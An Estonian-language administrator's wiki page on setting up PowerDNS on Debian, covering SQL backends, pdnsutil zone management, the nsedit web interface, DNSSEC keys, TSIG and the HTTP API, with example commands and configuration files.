* üldosa
* tsoonidega seotud andmete salvesamiseks erinevad backendid (failisüsteem, SQL andembaas jne)

Kui asutakse kasutama SQL backendi, siis võib olla otstarbekas enne PowerDNS vastava backendi paigaldamist baas ise paigaldada ja käivitada; nt nt see baas ei pruugi olla tingimata samas arvutis. Teisipidi, mugavam on samas arvutis, kuna sel juhul baasi saab lähtestada dbconfig süsteemi abil; lisaks, kui kasutatakse DNSSEC'i, siis arvestada, et krüptomaterjal asub baasis. Käesolevas tekstis paigaldatakse tarkvara PowerDNS repositooriumist kuna seal on alati kõige värskem.

====PostgreSQL andmebaasi ettevalmistamine====

PowerDNS tarkvara ei ole PostgreSQL andmebaasi versiooni suhtes nõudlik, tõenäoliselt sobib igasugune v. 9.x ja nt en_US.UTF-8 kodeering

# apt-get install postgresql

====Paigaldamine PowerDNS repositooriumist====

PowerDNS repositoorium asub aadressil https://repo.powerdns.com/ ja kasutamine (Debian v. 9 Stretch juhtumil)

# cat /etc/apt/sources.list.d/pdns.list
deb http://repo.powerdns.com/debian stretch-auth-master main

ning öelda

# curl https://repo.powerdns.com/CBC8B383-pub.asc | sudo apt-key add -
# apt-get update

Tarkvara paigaldamiseks öelda (paistab, et bind backend paigaldatakse lisaks paratamatult)

# apt-get install pdns-server pdns-backend-pgsql

seejuures on valik paigaldada baas db-config süsteemi abil ja see validagi. Tulemusena tekitatakse baasi baasi kasutaja, create database, initsiliseeritakse baasi sisu ning kirjeldatakse PowerDNS backend seadistus

# cat /etc/powerdns/pdns.d/pdns.local.gpgsql.conf
# PostgreSQL Configuration
#
# Launch gpgsql backend
launch+=gpgsql

# gpgsql parameters
gpgsql-host=127.0.0.1
gpgsql-port=
gpgsql-dbname=pdns
gpgsql-user=pdns
gpgsql-password=pdnsparool
gpgsql-dnssec=yes

Vaikimisi käivitatakse PowerDNS protsessid ning natuke saab asuda süsteemi kasutama

# pdns_control list-zones
All zonecount:0

Järgmisena tuleb PowerDNS server seadistada.

====Käsitsi baasi lähtestamine====

Kui db-config süsteemi mitte kasutada, sobib tekitada kasutaja ja create database andmebaas käsitsi

# su - postgres
$ psql
..
postgres=# create role pdns login password 'pdnsparool' NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE;
postgres=# create database pdns owner = pdns;

ning seejärel laadida baasi sisu, õieti struktuur

# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql

Lisaks peab olema seadistusfail /etc/powerdns/pdns.d/pdns.local.gpgsql.conf sobiva sisuga, vt. eelmist punkti.

===Tarkvara seadistamine===

Üldosa sobiks kokkuvõttes seadistada nt nii

# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.0/8,::1,192.168.1.210
also-notify=192.168.1.210
api=yes
api-key=midagisalajast123
default-soa-mail=hostmaster.moraal.ee.
default-soa-name=ans1.moraal.ee.
include-dir=/etc/powerdns/pdns.d
launch=
master=yes
only-notify=192.168.1.210
security-poll-suffix=
setgid=pdns
setuid=pdns
slave=yes
soa-expire-default=3600000
soa-minimum-ttl=3600
soa-refresh-default=86400
soa-retry-default=7200
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24

kus

* allow-axfr-ips - millistelt ip aadressidelt on lubatud axfr
* also-notify - millistele ip aadressidel töötavatele nimeserveritele saata notify
* api* - api kasutamine (vajalik veebipõhise haldusliidese nsedit jaoks)
* default-soa-* - uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* only-notify - notify saadetakse ainult näidatud ip aadressidele (mitte tsoonifailides siselduvatele NS serveritele)
* soa-* uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* webserver* - powerdns sisemise veebiserveri ip aadress jms (saab uurida protsesside statistikat)

Muudatuste kehtestamiseks lõpetada ja käivitada pdns protsessid

# systemctl stop pdns
# systemctl start pdns

===Tsooni sisu haldamine käsurealt===

Tsooni sisu haldamine käsurealt toimub utiliidi pdnsutil abil. Uue tühja tsooni tekitamine (sisaldab SOA kirjet), seejärel tuleb vähemalt NS kirje tekitada (nb! nii tekib Native tüüpi tsoon)

# pdnsutil create-zone moraal.ee

Tulemuse küsimine

# pdnsutil show-zone moraal.ee

Tsooni Native -> Master teisendus

# pdnsutil set-kind moraal.ee master

Tsooni sisu esitamiseks

# pdnsutil list-zone moraal.ee

Sisu muutmiseks, sh muuta käsitsi SOA serial

# pdnsutil edit-zone moraal.ee

utiliidiga seriali suurendamiseks

# pdnsutil increase-serial moraal.ee

Tulemuse küsimine

# dig @127.0.0.1 moraal.ee axfr

Notify käsitsi välja saatmiseks

# pdns_control notify moraal.ee
Added to queue

Kirje lisamine (lisaks tuleb increase serial öelda)

# pdnsutil add-record moraal.ee imre5 A 300 "127.0.0.5"
Feb 21 10:20:54 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
New rrset:
imre5.moraal.ee. IN A 300 127.0.0.5

===Veebipõhine haldusliides nsedit===

Veebipõhiste haldusliideste abil saab

* tekitada ja kustutada tsoone, muuta tsoonide sisu
* loodetavasti haldusliidese abil jäävad tegemata mingid süntaksivead, mida on kerge teha nn BIND-ühilduvat tsoonifaili tavalise tekstieditoriga otse muutes
* tsooni sisu halduse saab usaldada mitte-vi/joe/nano ekspertiisiga inimesele

Paistab, et veebipõhiseid haldusliideseid on omajagu, https://github.com/PowerDNS/pdns/wiki/WebFrontends. nsedit on PHP rakendus. Märkused

* Tsoonis tehtud muudatustega kaasneb automaatselt SOA seriali suurenemine
* Veebiliideses tehtud muudatused ei kajastu alati sama veebiliideses koheselt (nt SOA seriali muutumine, välja ja sisselogimise järel on näha)
* nsedit esitab muudatuste logi
* toimib ipv6 jaoks
* nn õäöü tähti sisaldavaid nimesid sisestada otseselt ei saa
* rakenduse võib paigaldada http:// peale ja seejärel muuta veebiserveri seadistusi ning kasutada edasi https:// abil
* nsedit ei pea asuma samas arvutis PowerDNS serveriga, suhtlemine toimub üle võrgu ja kasutades API liidest

====Ettevalmistused====

nsedit kasutamise eelduseks on selline tarkvara

# apt-get install apache2 php git php-sqlite3 php-curl

====Paigaldamine ja seadistamine====

Kopeerida tarkvara, tundub, et 2017 aasta alguses on praktiline võtta git repo viimane ots

# cd /var/www/html
# git clone https://github.com/tuxis-ie/nsedit.git

Tekitada php skriptide jaoks kasutaja:grupp

# groupadd nsedit
# useradd -g nsedit -m -d /opt/nsedit -s /bin/false nsedit

Avades brauseris http://pdns.moraal.ee/nsedit küsitakse parooli, vaikimisi sobib admin ja admin mille järel

* kontrollitakse vajalike teekide olemasolu
* moodustatakse sqlite3 andmebaas

# sqlite3 /var/www/html/etc/pdns.users.sqlite3
..
sqlite> .tables
logs users zones

nsedit seadistatakse failis /var/www/html/nsedit/includes/config.inc.php

# cp includes/config.inc.php-dist includes/config.inc.php

* ühendust powerdns serveriga üle api juhib sektsioon

# cat /var/www/html/nsedit/includes/config.inc.php | grep '^$api'
$apipass = 'apiparool'; # The PowerDNS API-key
$apiip = '10.0.9.18'; # The IP of the PowerDNS API
$apiport = '8081'; # The port of the PowerDNS API
$apiproto = 'http'; # http | https
$apisslverify = FALSE; # Verify SSL Certificate if using https for apiproto

* vaikeväärtuste kasutamiset haldusliideses kontrollib

$defaults['soa_edit'] = 'INCEPTION-INCREMENT';
$defaults['soa_edit_api'] = 'INCEPTION-INCREMENT';
$defaults['defaulttype'] = 'Master'; # Choose between 'Native' or 'Master'
$defaults['ns'][0] = 'ns1.moraal.ee.'; # The value of the first NS-record
$defaults['ns'][1] = 'ns2.moraal.ee.'; # The value of the second NS-record
$defaults['ttl'] = 3600; # Default TTL for records
$defaults['disabled'] = false; # Default disabled state

Kasutajaliides paistab välja selline

[[Pilt:Pdns-1.gif]]

kus

* TODO

Kui rakendus töötab, muuta rakenduse failide omanik:grupp ära

# chown -R nsedit:nsedit /var/www/html/nsedit

====Kasutamine====

* Kasutajate lisamine, valida (ning märkida linnuke admin user jaoks), tulemusena on nsedit logid paremad

Users -> Add new user

* Uue tsooni lisamine, valida

Zones -> Add new zone

ning sisestada Domain lahtrisse domeeninimi, lõpetades punktiga, nt

test-1.ee.

Kõik muud valikud jätta vaikimisi

Account - admin
Type - master
Template - None

Kuna pdns serveri seadistusfailisis on näidatus SOA kirje väärtused ja nsedit seadisusfailis on kirjeldatud nimeserverid, siis tekib vaikimisi kastutatav tulemus.

* Uue tsooni lisamine kirjeldades korraga palju kirjeid (nt tsooni ületoomisel eelmise dns teenusepakkuja juurest)

Zones -> Import a new zone

seejuures

avanenud dialoogi pasteda tsoonifaili sisu
eemaldada SOA kirje
asendada NS kirjetesse õiged väärtused
kõik nimed (kirje kõige vasem positsioon) peavad olema pikad ja lõppema punktiga
eemaldada linnuke 'Overwrite Nameservers' juurest

* Mitme elemendilise väärtuse puhul tuleb see nii sisestada, nt MX kirje puhul

10 mx.moraal.ee.

* Eeldusel, et on olemas Content tulbas kasutatav A kirje ip aadressile vastav in-addr.arpa tsoon, saab nsedit abil tekitada automaatselt PTR kirje.

====Kasulikud lisamaterjalid====

* https://github.com/tuxis-ie/nsedit

===DNSSEC tsooni esmane juurutamine===

Tundub, et uuemal ajal saab DNSSEC juures kasatada CSK (Combined Signing Key) võtit ja seda kasutab PowerDNS vaikimisi, kuid samas CSK võtmeid registripidajad eriti ei toeta. Ja PowerDNS toetab ka nö klassikalist KSK+ZSK komplekti kasutamist.

====KSK ja ZSK võtmete kasutamine====

Võtmete tsooniga seostamiseks sobib öelda

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256
# pdnsutil add-zone-key moraal.ee zsk 1024 active rsasha256
# pdnsutil set-nsec3 moraal.ee '1 0 5 0...f'
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil set-meta moraal.ee SOA-EDIT INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil rectify-zone moraal.ee
# pdnsutil show-zone moraal.ee

mis

* tekitab võtmed
* kui set-meta kogemata vääratab, nt lisati SOA-EDIT-SOA, siis saab meta data eemaldada, st näitamata väärtust

# pdnsutil set-meta moraal.ee SOA-EDIT-SOA

* võtab kasutusele nsec3 hash'ide arvutamiseks vajaliku materjali (0-f on 16-elemendiline juhuslik hex järgnevus, mis saadake nt nii

$ head -c 512 /dev/urandom | sha1sum | cut -b 1-16
7bc59a6dd87fa477

ja ideaalis võiks seda regulaarselt muuta), nt

$ dig +short moraal.ee nsec3param
1 0 5 E7544BB6070C3E0F

(kus 1 - sha1, 0 - opt-out, 5 - iterations, E7544BB6070C3E0F - salt)

* INCEPTION-INCREMENT rida seadistab selliselt, et kui automaaselt tsooni andmed resigneeritakse, siis suurendatakse ka seriali (muidu ei toimu notify ja andmed ei jõua avalikesse pädevatesse nimeserveritesse)
* rectify tuleb põhimõtteliselt öelda peale iga tsooni muudatust, et olla täiesti kindel tsooni toimimises; kui PowerDNS kasutatakse avalike nimeserverite varjatud masterina, pole see probleem

ning tsooni andmed paistavad

# pdnsutil show-zone moraal.ee
Nov 06 23:49:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016103003 == 2016103003 (serial in the database)
Metadata items:
SOA-EDIT INCEPTION-INCREMENT
SOA-EDIT-API INCEPTION-INCREMENT
Zone has NSEC3 semantics, configuration: 1 0 1 ab
keys:
ID = 11 (ZSK), flags = 256, tag = 26589, algo = 8, bits = 1024 Active ( RSASHA256 )
ID = 10 (KSK), flags = 257, tag = 53461, algo = 8, bits = 2048 Active ( RSASHA256 )
KSK DNSKEY = moraal.ee. IN DNSKEY 257 3 8 AwEAAcn... TQcnQstT+tU= ; ( RSASHA256 )
DS = moraal.ee. IN DS 53461 8 1 6c123b39076072da... c66f62b1e3c388b86b7f ; ( SHA1 digest )
DS = moraal.ee. IN DS 53461 8 2 b85dee98efa6e3bb... 57ce193f728f6b2b1d0dd262 ; ( SHA256 digest )
DS = moraal.ee. IN DS 53461 8 3 1359b0b2b97e60b2... 844b207e84bf5c109eb2e151 ; ( GOST R 34.11-94 digest )
DS = moraal.ee. IN DS 53461 8 4 6d735926cd5cf68b... 9ca2af1f72b3b8f67900bb32a94c ; ( SHA-384 digest )

kus

* kaks võtit, ID väärtustega 10 ja 11

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje (reeglina see õnnestub, aga nt 2017 aasta kevadel .org domeenide puhul on tulemuseks dnssec viga, tavaline servfail)
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

====Tulemuse kontrollimine====

Kui kõik juba töötab (ja on vist on vajalik, et kasutada on mõni dnssec-võimeline rekursiivne nimeserver), saab tulemust kontrollida nt nii

$ ldns-rrsig moraal.ee a
moraal.ee RRSIG(a): Thu Oct 27 00:00:00 2016 - Thu Nov 17 00:00:00 2016

====Märkused====

* DNSSEC RRSIG signatuure arvutatakse iga 2 nädala tagant üle selleks, et piirata replay attack võimalusi. Põhimõtteliselt saab pahalane päringule vastuseks saata mõne varasemalt võrgus olnud vastuse (st RRSet + RRSIG komplekti) eeldusel, et ta kontrollib kasutaja võrguliiklust. Tänu RRSIG piiratud kehtivusajale (nt 2 nädalat) saab ta seda teha mitte vanemate kui 2 nädalat andmetega, lisaks ta on piiratud saatma mitte suvalisi vastuseid, vaid viimase kahe nädala jooksul kasutuses olnud vastuseid.

====Kasulikud lisamaterjalid====

* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/

====CSK võtme kasutamine====

Märkus 2016 lõpus: tundub, et see CSK on mingi tulevikutehnoloogia.

Olemasoleva tsooni jaoks DNSSEC sisselülitamiseks sobib öelda

# pdnsutil secure-zone moraal.ee
# pdnsutil set-nsec3 moraal.ee '1 0 1 ab'
# pdnsutil rectify-zone moraal.ee
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil show-zone moraal.ee

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

Misc

* tagasi nsec peale viimiseks

# pdnsutil unset-nsec3 moraal.ee

===DNSSEC tsooni seostamine DS sissekande abil ülevalpool oleva tsooniga===

DNSSEC tsooni seostamiseks ülevalpool oleva tsooniga on vaja teada selliseid andmeid

* võtme silt
* võtme tüüp
* algoritm
* avalik võti (või DS mis on avaliku võtme räsi vms)

Need kõik on avalik info ja kättesaadavad domeeni pädevast nimeserverist, aga PowerDNS haldusutiliidiga saab selle küsida otsekoheselt

# pdnsutil show-zone moraal.ee

Ühesõnaga, kui ise kasutatakse PowerDNS'i või partner saadab need andmed, siis allpool toodud dig käsuga tegelemist pole tarvis läbi teha. Tulemust sobib kontrollida nt aadressil http://dnsviz.net/.

====zone.ee keskkonnas - .ee tsoonis====

Logida sisse oma kasutajaga ja valida vasakult paneelist 'Teenuste ülevaade', kõnelaluse tsooni juures pressida rohelist + märki DNSSEC tulbas. Avanenud uuel eraanil vajutada üleval sinist nuppu Aktiveeri (muutub roheliseks), vajutada võtmete nimekirjas + märki ja täita lahtrid

[[Pilt:Pdns-3.gif]]

kus

* võtme silt - (antud juhul 53461), selle saab teada päringu väjundist

$ dig @ns.auul.pri.ee moraal.ee dnskey rrsig | grep DNSKEY
moraal.ee. 10800 IN RRSIG DNSKEY 8 2 10800 20161208000000 20161117000000 53461 moraal.ee. rVy+HAzSKkTRv6...

* võtme tüüp - KSK
* algoritm - 8 (RSA-SHA256)
* avalik võti, selle saab teada päringu väljundist, alates Aw kuni tU= (võib sisaldada tühikuid nagu päringu vastuses on)

$ dig @ns.auul.pri.ee moraal.ee dnskey | grep 257
moraal.ee. 3600 IN DNSKEY 257 3 8 AwEAAcnmmnnOlkRfK9NDYEI6F ... SD6 TQcnQstT+tU=

Vajutada all nuppu Kinnita, muudatus kehtestub peaaegu koheselt (ehk minutite jooksul), aga kasutajaliideses öeldakse

DNSSEC kaitse domeenil MORAAL.EE
Hetkestaatus: DNSSEC on aktiveerimata
Eesootavad muutused: DNSSEC aktiveeritakse

Teha brauseris refresh ja peab olema domeenide nimekirjas DNSSEC tulbas + asemel kilbi kujutis. Edasi läheb nn 15 minutit kuni muudatus zone.ee juurest eestiinternet.ee juurde jõuab ning kehtestub ee. tld (top level domain) nimeserverites. Kontrolliks maksab küsida tld nimeserverilt ds kirjet

$ dig +short @ns.tld.ee moraal.ee ds
30607 8 2 EAC8A17DD2128573F08EE76C18B4AB01734467CD4A376768F5358B0C A2B9463F

====zone.ee keskkonnas - .org tsoonis====

[[Pilt:Pdns-6.gif]]

====GoDaddy keskkonnas====

TODO

===DNSSEC võtmete asendamine===

====ZSK====

====KSK====

KSK moodi võtme lisamiseks sobib öelda, selliselt võib tsooniga siduda ka enam kui kaks võtit

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Tsooniga seotud võtmed paistavad käsu väljundis

# pdnsutil show-zone moraal.ee

Tulemusena paistab dnsviz keskkonnas selline pilt

TODO

Tsooniga seotud võtme eemaldamiseks sobib öelda, kus ID on show-zone väljundist välja valitud võtme ID väärtus

# pdnsutil remove-zone-key moraal.ee ID

====Kasulikud lisamaterjalid====

* https://doc.powerdns.com/md/authoritative/howtos/#zsk-rollover

===Mitmesugused haldusprotseduurid===

====tsooni backend muutmine====

TODO

====tsooni toomine PowerDNS kontrolli alla====

Tsooni migreerimiseks suvalisest AXFR-võimelisest nimeserverist sobib

* kirjeldada PowerDNS peal slave

# pdnsutil create-slave-zone moraal.ee 10.0.6.15
Feb 21 22:09:52 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Creating slave zone 'moraal.ee', with master(s) '10.0.6.15:53'

* kopeerida andmed axfr abil üle, kopeerimist kiirendab

# pdns_control retrieve moraal.ee

* muuta PowerDNS tsooni jaoks masteriks, öeldes

SQL> UPDATE domains set type='MASTER' where type='SLAVE';

Kui allikaks on nt BIND ning tsoonifailis on kasutatud generate konstruktsiooni, siis need lahenduvad automaatselt ära

$GENERATE 1-255 $ IN CNAME $.1-255.40.184.10.in-addr.arpa.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/authoritative/migration/

====dnssec tsooni toomine PowerDNS kontrolli alla====

Analoogiliselt eelmisele punktile, aga

* esmalt lülitada dnssec välja, kustutades DS kirje parent tsoonist ja oodates vähemalt DS kirje TTL aja enne järgmise punkti juurde asumist; seejärel on tsooni sisu endine st vanade võtmetega signeeritud andmestik
* tegevused eelmises punktis + uute võtmetega krüptimine
* asuda kasutama uute võtmetega krüptitud tsooni sisu, ja oodata nt 6 tundi
* juurutada parent tsoonis uus DS kirje

====dnssec tsooni toomine PowerDNS kontrolli alla OpenDNSSEC keskkonnast koos vana KSK krüptomaterjaliga====

Eeldusel, et OpenDNSSEC kasutab SoftHSM backendi saab KSK krüptomaterjalid eksportida ja taaskasutada. Ettevalmistuseks tuleb kõnealune tsoon muus osas tavalisel viisil kasutusele võtta. SoftHSM pealt krüptomaterjali eksportimiseks tuleb esmalt teha kindlaks kolm väärust

* SoftHSM label ja pin vaadata nt /etc/opendnssec/conf.xml failist
* kõnealuse tsooni ksk võtme id, vaadata KSK active realt tulp 'CKA_ID'

# ods-ksmutil key list -v

sobib öelda

# softhsm --export moraal.ee-ksk.pem --slot 0 --label "vaartus" --pin vaartus --id vaartus
The key pair has been written to moraal.ee-ksk.pem

teisendada nn BIND kujule

# softhsm-keyconv --tobind --in ksk.pem --name moraal.ee --ksk --algorithm RSASHA256
The private key has been written to Kmoraal.ee+008+09122.private
The public key has been written to Kmoraal.ee+008+09122.key

ning võtta kasutusele PowerDNS juures

# pdnsutil import-zone-key moraal.ee Kksk+008+53675.private active ksk

Edasi seadistatakse DNSSEC analoogliselt nagu seada ikka PowerDNS puhul seadistatakse. Kusjuures 'pdnsutil import-zone-key ...' tulemus on sarnane nagu oleks öeldud

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Kasulikud lisamaterjalid

* http://www.molnar-peter.hu/en/

====pdns-control utiliidi kasutamine====

PowerDNS kus on master tsoon saadab notify oma slavedele (nagu on tsoonifaili NS kirjetes kirjas)

# pdns_control notify <domain>

või näidatud ip aadressile

# pdns_control notify-host <domain> <ip-address>

===TSIG kasutamine===

Nimeserverite vahelise tsooniedastuse juures TSIG juurutamiseks tuleb esmalt tekitada võti

# pdnsutil generate-tsig-key from_dns_to_itm hmac-sha256
Generating new key with 64 bytes (this can take a while)
Nov 26 13:10:37 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Create new TSIG key from_dns_to_itm hmac-sha256 WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ==

kus

* TODO

ning seejärel võti ühe või enama tsooniedastusega seostada

# pdnsutil activate-tsig-key moraal.ee from_dns_to_itm master

Tulemus paistab nii

<pre>
# pdnsutil show-zone moraal.ee
Nov 26 14:09:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016112602 == 2016112602 (serial in the database)
Zone is not actively secured
Zone has following allowed TSIG key(s): from_dns_to_itm
Metadata items:
SOA-EDIT-API DEFAULT
TSIG-ALLOW-AXFR from_dns_to_itm
No keys for zone 'moraal.ee'.
</pre>

kontrolliks sobib kopeerida öeldes

$ dig @192.168.1.248 moraal.ee axfr -y "hmac-sha256:from_dns_to_itm:WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ=="

kusjuures vastuses on üks preudokirje lisaks

..
from_dns_to_itm. 0 ANY TSIG hmac-sha256. 1480164029 300 32 t96WhnpNiAiL5KHXa8UzNthM6/p3ciQptF3Br2ZfhFk= 3538 NOERROR 0
...

Väited

* Sama TSIG võtit saab kasutada mitme tsooni jaoks ja nii on mugavam nt NSD patternit kasutada
* tundub, et tsooni jaoks TSIG juurutamisega kaasneb, et tsooni kopeerimise ip piirang enam ei kehti (lubatud ip pealt pöördudes ei ole võtme esitamine vajalik)
* kui tsooni juures on tsig sisse lülitatud, siis see mõjub nii notify kui xfr jaoks
* TSIG pseudokirjete arv suureneb vastavalt tsooni mahu suurenemisele, https://tools.ietf.org/html/rfc2845 'The TSIG MUST be included on the first and last DNS envelopes. It can be optionally placed on any intermediary envelopes. It is expensive to include it on every envelopes, but it MUST be placed on at least every 100'th envelope.'

Alternatiiv on kasutada -y asemel -k suvandit ja argumendiks failinime, faili sisuga

<pre>
key "from_yks_to_teine" {
algorithm HMAC-SHA256;
secret "YY8xvlL6yGjrt1G4xlfLBaidQOFdvixHgRXN6tXUPMitEKZUs7kl7qixJ0nSN1bbDJQxaFGkoKkBamNS7EPXbw==";
};
</pre>

===API kasutamine===

Üle API muudatuse tegemiseks peab eelnevalt PowerDNS serveris lülitama API sisse ning sisemise webserver käivitama

# cat /etc/powerdns/pdns.conf
..
api=yes
api-key=apiparool
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24
...

ja kasutama nt sellist skripti (töökohaarvutis on seejuures abil kasutada nt jq utiliiti)

<pre>
# cat pdns-api.sh
curl -X PATCH --data \
'{"rrsets":
[{ "name": "www.moraal.ee.",
"records": [{ "content": "192.168.254.5", "disabled": false }],
"ttl": 86000,
"type": "A",
"changetype": "REPLACE"
}]
}' -H 'X-API-Key: midagisalajast123' http://192.168.1.248:8081/api/v1/servers/localhost/zones/moraal.ee. | jq .
</pre>

kus

* TODO

kas käivitamiseks öelda

$ sh pdns-api.sh

API'ga tutvumiseks võib olla hea mõte kuulata pealt mingi olemasoleva API-rakenduse ja serveri vahelist liiklust ja siis seda Wireshark abil uurida.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/httpapi/README/ - tundub, et süntaks pole seal kõigis näidetes päris korrektne

===PowerDNS kasutusstatistika===

PowerDNS sisaldab sisemist veebiserverit, mille käest saab küsida teenuse kasutusstatistikat, TODO.

===Logimine===

Tundub, et vaikimisi logitakse syslog'i.

===Varundamine ja taaste===

TODO

===Misc===

====Paigaldamine operatsioonisüsteemi paketihaldusest====

Paigaldamiseks sobib öelda, tuleb paigalda üldosa + mingi backend, nt BIND-ühilduvate tsoonifailide käsitlemise komponent (st failisüsteem)

# apt-get install pdns-server pdns-backend-bind

Tulemusena tekib failisüsteemi

* /etc/powerdns/pdns.conf - peamine seadistusfail

====MySQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====pdns-backend-mysql paigaldamine ja seadistamine====

Eeldusel, et MySQL baas juba töötab samas arvutis, sobib paigaldamiseks sobib öelda (seejuures kasutades db-config sistemat, mis paigaldamise käigus tekitab create database baasi, kasutaja, sätib privileegid jne)

# apt-get install pdns-backend-mysql
..
Determining localhost credentials from /etc/mysql/debian.cnf: succeeded.
dbconfig-common: writing config to /etc/dbconfig-common/pdns-backend-mysql.conf

Creating config file /etc/dbconfig-common/pdns-backend-mysql.conf with new version

Creating config file /etc/powerdns/pdns.d/pdns.local.gmysql.conf with new version
checking privileges on database pdns for pdns@localhost: user creation needed.
granting access to database pdns for pdns@localhost: success.
verifying access for pdns@localhost: success.
creating database pdns: success.
verifying database pdns exists: success.
populating database via sql... done.
dbconfig-common: flushing administrative password
Processing triggers for libc-bin (2.24-3) ...
Processing triggers for pdns-server (4.0.1-5) ...

Tulemusena

* tekitatakse MySQL kasutaja pdns
* tekitatakse MySQL create database pdns

====BIND backend kasutamine====

Tundub, et otsekoheselt failisüsteemis tsoonifaili redigeerimise teel on mõeldav töötada ainult BIND-formaadis backendiga. Muudega tuleks kasutada pdnsutil utiliiti või API liidest. Tsoonide nimekiri kirjeldatakse failis

# cat /etc/powerdns/named.conf
# Debian default: supermaster created zones are written here:
include "/var/lib/powerdns/supermaster.conf";
# Example for a manually configured slave zone:
#
zone "example.net" {
file "/var/lib/powerdns/zones.slave.d/example.net.zone";
type master;
masters { 192.0.2.53; };
};

Tsoon kirjeldatakse failis

# cat /var/lib/powerdns/zones.slave.d/example.net.zone
$TTL 180
@ IN SOA ns1.example.net. hostmaster.example.net. (
2014080705 ; Serial Number (date YYYYMMDD++)
86400 ; Refresh (24 hours)
1800 ; Retry (1/2 hour)
3600000 ; Expire (42 days)
21600) ; Minimum (6 hours)
IN NS ns1.example.net.
IN NS ns2.example.net.

@ IN A 192.168.0.15
IN MX 10 mail.example.net.
www IN A 192.168.0.15
mail IN A 192.168.0.2
ns1 IN A 10.1.1.171
ns2 IN A 10.1.1.172
imre IN A 10.1.1.173

Muudatuse kehtestamiseks

# pdns_control bind-reload-now example.net
example.net: parsed into memory at 2016-10-26 20:43:14 +0300

====PostgreSQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====BIND backend kasutamine====

pdns-backend-bind seadistatakse failist

# egrep -v "^$|^#" /etc/powerdns/pdns.d/bind.conf
launch+=bind
bind-config=/etc/powerdns/named.conf
bind-supermaster-config=/var/lib/powerdns/supermaster.conf
bind-supermaster-destdir=/var/lib/powerdns/zones.slave.d

kus

* /etc/powerdns/named.conf - tsoonide nimekiri
* /var/lib/powerdns/supermaster.conf - lihtsal juhul tühi
* /var/lib/powerdns/zones.slave.d - BIND formaadis tsoonifailide kataloog

Tsoonide haldamisega tegeleb edasi allpool olev punkt.

====Poweradmin====

Märkus: tõenäoliselt ei ole Poweradmin tarvkara kasutamine hea mõte kuna rakendus sodib otse PowerDNS andmebaasis ja 2016 aasta sügisel on hakanud tekkima paremaid alternatiive, nt nsedit.

Poweradmin kasutamiseks peab PowerDNS kasutama SQL andmebaasi ja Poweradmin peab töötama vastu sama andmebaasi. Tundub, et Poweradmin töötab paremini MySQL + PHP5 keskkonnas. Kui Poweradmin PHP rakendus töötab teises arvutis kui MySQL baas, sobib baasis öelda

mysql> grant all privileges on pdns.* to 'pdns'@'%' identified by 'dbconfig sisestatud parool';
mysql> grant all privileges on pdns.* to 'pdns'@'localhost' identified by 'dbconfig sisestatud parool';
mysql> flush privileges;

# pdns_control retrieve moraal.ee
Added retrieval request for 'moraal.ee.' from master 192.168.1.247

Kasulikud lisamaterjalid

* https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-powerdns-with-a-mariadb-backend-on-ubuntu-14-04

====Tsooni andmestikust otsing====

* Kõigi forward tsoonide sisust ip aadressi kasutamise leidmine

# for i in `pdns_control list-zones | grep -v All | grep -v in-addr`; do pdnsutil list-zone $i 2>&1 ; done | grep 10.20.123.154
ftp.moraal.ee 300 IN A 10.20.123.154

===2024 aasta kevade tähelepanekud===

Eesmärk

* ühe operatsioonisüteemi peal kompaktselt lahenduse pidamine - Debian v. 12
* dns server - PowerDNS
* webgui haldusliides - PowerDNS-Admin (PDA)
* dnssec võimekus
* docker abil kasutatakse konteinerit (PDA)
* andmeid hoitakse PostgreSQL andmebaasis

====Tööpõhimõte====

Väited

* dnssec kasutab algoritmi nr 13
